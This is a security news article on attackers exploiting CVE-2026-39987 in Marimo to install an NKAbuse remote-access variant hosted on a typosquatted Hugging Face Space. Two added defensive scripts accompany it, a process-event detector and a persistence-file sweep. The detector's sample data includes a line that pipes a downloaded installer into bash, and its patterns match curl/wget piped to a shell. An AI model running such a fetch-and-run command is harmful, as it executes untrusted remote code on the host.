Security alert: CVE-2026-39987 in Marimo allows remote code execution and deployment of NKAbuse via Hugging Face Spaces


Within days, a wave of exploitation of a critical vulnerability was unleashed against Marimo, an interactive Python environment built around reactive notebooks, and the attackers wasted no time: they used the flaw to distribute a new variant of the malware known as NKAbuse, hosted in a Hugging Face Space. What is worrying is not only the existence of the flaw but the speed with which it was exploited after the technical details were published, according to tracking carried out by the cloud security firm Sysdig.

The flaw, identified as CVE-2026-39987, allows remote code execution on vulnerable Marimo instances. Sysdig documented exploitation attempts that began less than 10 hours after technical disclosure, and has since observed campaigns that have evolved in both volume and technique. One of the most striking tactics was the use of Hugging Face Spaces, the community platform for deploying demos and AI tools from Git repositories, as a vector to serve malicious payloads from a legitimate domain with a clean reputation. Sysdig's tracking is covered in more detail in its technical report.


In the incidents observed, the malicious actor published a Space with a name that imitates legitimate tools ("vsccode-modetx", a clear VS Code typosquat), where they hosted an installer script and a binary called "kagent", named to resemble legitimate Kubernetes orchestration agents. After exploiting the remote code execution in Marimo, the attacker used curl to fetch the installer from that Space and ran it. Using a legitimate endpoint like Hugging Face makes detection difficult because the traffic goes to a well-known domain with a valid HTTPS certificate, which keeps many automated security alerts from firing.
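Because the download host passes any reputation check, detection has to key on behaviour instead. The following is an added example, not code from the article or from Sysdig: it scores process-execution events on three behaviours. The event schema (`parent`, `cmdline`), the allowlist, the Space owner and the installer filename are all assumptions or placeholders.

```python
import json
import re
from urllib.parse import urlparse

# Assumption: the only hosts this notebook workload is expected to download from.
EGRESS_ALLOWLIST = {"pypi.org", "files.pythonhosted.org"}

FETCH = re.compile(r"\b(?:curl|wget)\b[^|;&]*?(https?://[^\s'\"|;&]+)")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")

# Constructed process-execution events (hypothetical JSON schema: parent, cmdline).
# The Space owner and installer filename are placeholders, not values from the report.
SAMPLE_EVENTS = """\
{"parent": "marimo", "cmdline": "sh -c 'curl -fsSL https://huggingface.co/spaces/EXAMPLE-OWNER/vsccode-modetx/resolve/main/INSTALLER.sh | bash'"}
{"parent": "marimo", "cmdline": "pip install pandas"}
{"parent": "bash", "cmdline": "curl -O https://files.pythonhosted.org/packages/example.whl"}
{"parent": "marimo", "cmdline": "wget https://data.example.invalid/set.csv"}
"""

def reasons_for(event):
    """Return the suspicious behaviours seen in one event (empty list = none)."""
    match = FETCH.search(event["cmdline"])
    if not match:
        return []  # no curl/wget download in this command line
    host = urlparse(match.group(1)).hostname or ""
    reasons = []
    if host not in EGRESS_ALLOWLIST:
        reasons.append(f"non-allowlisted host {host}")
    if PIPE_TO_SHELL.search(event["cmdline"]):
        reasons.append("download piped into a shell")
    if "marimo" in event.get("parent", ""):
        reasons.append("child of the notebook server")
    return reasons

def scan(lines, threshold=2):
    """Parse JSON-lines events; alert when at least `threshold` behaviours co-occur."""
    alerts = []
    for line in lines.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        reasons = reasons_for(event)
        if len(reasons) >= threshold:
            alerts.append((event["cmdline"], reasons))
    return alerts

if __name__ == "__main__":
    for cmd, why in scan(SAMPLE_EVENTS):
        print(f"ALERT {why}: {cmd}")
```

The allowlist is per workload rather than a global reputation list, which is why a fetch from huggingface.co is still scored here.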

The installer downloaded the binary, deployed it locally and configured common persistence mechanisms on Linux and macOS, such as systemd units, scheduled tasks with cron, or launch agents on macOS. Sysdig's analysis shows that the malware sample is a previously undocumented variant of NKAbuse, a family that became known for abusing the decentralized NKN network to exchange data between nodes. Previous research, including Kaspersky's, had described how NKAbuse used NKN and traversal techniques for its communications; the Sysdig report indicates that the new version acts more like a remote access Trojan, capable of running shell commands on the compromised machine and returning the results to the operator, using patterns that include references to the NKN client protocol and components such as WebRTC / ICE / STUN for NAT traversal. Kaspersky's NKAbuse material is available on Securelist, and the Sysdig report mentioned above gives more context on the technique observed.

Exploitation has not been limited to distributing this binary. Sysdig also documented different operators who took advantage of the same flaw for classic post-compromise tasks: reverse shell attempts over multiple ports, theft of credentials from environment files (.env), lateral movement to PostgreSQL databases to list schemas and tables, and attacks on Redis in which session tokens and cached data were extracted from the application. These behaviors show that attackers use the access they obtain in many ways, from fraud and espionage to building wider botnets or maintaining persistent backdoors.

If you manage environments that use Marimo, the operational recommendation is clear and urgent: update to version 0.23.0 or later as soon as possible. Updating is the most effective way to close the door on this exploitation technique. When the update is not immediately feasible, blocking external access to the /terminal/ws endpoint with firewall rules, or disabling it completely, can significantly reduce the risk of remote execution. In addition, it is advisable to put egress controls in place that detect atypical downloads by curl or wget from third-party domains, and to review systems for characteristic artifacts: binaries with suspicious names, new service units, cron or LaunchAgents entries, and unusual traffic associated with WebRTC / STUN. For more details about Hugging Face Spaces and its deployment model, the official Hugging Face Spaces documentation is a good starting point.
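One way to carry out the artifact review described above, as an added example that is not from the article or from Sysdig. It sweeps the standard systemd, cron and LaunchAgents locations for files that mention a given binary name (such as "kagent") or that changed after a chosen time; the directory list is an assumption, since the page names the mechanisms but not exact paths.

```python
import time
from pathlib import Path

# Standard Linux/macOS persistence locations (assumed; the page names the
# mechanisms, not exact paths). Relative, so a mounted disk image can be swept too.
SYSTEM_DIRS = ["etc/systemd/system", "etc/cron.d", "var/spool/cron",
               "Library/LaunchAgents", "Library/LaunchDaemons"]
USER_DIRS = [".config/systemd/user", "Library/LaunchAgents"]
HOME_PARENTS = ["home", "Users"]

def candidate_dirs(root):
    """List the persistence directories that actually exist under `root`."""
    root = Path(root)
    dirs = [root / d for d in SYSTEM_DIRS]
    homes = [root / "root"]
    for parent in HOME_PARENTS:
        if (root / parent).is_dir():
            homes += [h for h in (root / parent).iterdir() if h.is_dir()]
    dirs += [h / d for h in homes for d in USER_DIRS]
    return [d for d in dirs if d.is_dir()]

def sweep(root, names, since):
    """Return {relative path: [reasons]} for persistence files that mention one
    of `names` or were modified after `since` (epoch seconds)."""
    root = Path(root)
    findings = {}
    for directory in candidate_dirs(root):
        for path in sorted(p for p in directory.rglob("*") if p.is_file()):
            try:
                text = path.read_text(errors="replace")
                mtime = path.stat().st_mtime
            except OSError:
                continue  # unreadable entry: skip it rather than abort the sweep
            reasons = [f"references {n}" for n in names
                       if n in text or n in path.name]
            if mtime > since:
                reasons.append("modified after exposure window start")
            if reasons:
                findings[path.relative_to(root).as_posix()] = reasons
    return findings

if __name__ == "__main__":
    # Example: sweep the live host for anything changed in the last 14 days.
    for rel, why in sweep("/", ["kagent"], time.time() - 14 * 86400).items():
        print(rel, why)
```

Set `since` to the moment the instance first became reachable on a vulnerable version; a hit on modification time alone still needs manual review.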


On the strategic level, this episode again highlights two lessons that we should already have internalized: on the one hand, the speed with which critical vulnerabilities are exploited after they are disclosed; on the other, the advantage attackers gain by using legitimate infrastructure to host their tools, which complicates detection based solely on domain reputation. The combination of agile patching, outbound network restrictions and detection of suspicious behavior is the most reasonable defense against such operations.

For those who need formal references on the vulnerability itself, the corresponding entry in the CVE database provides the public identifier and the traceability of the flaw: CVE-2026-39987. And if you want to review the tracking and technical indicators published by the researchers who monitored these campaigns, the Sysdig report is the most detailed source for now.

If you are responsible for security or system administration, act today: prioritize the update, review the exposed endpoints, block untrusted download paths and look for signs of persistence and abnormal communication. If your organization uses demo or deployment spaces from public repositories, review the permitted content policy and apply strict access and egress controls. In an ecosystem where AI and collaborative platforms are increasingly integrated, security cannot be left behind.
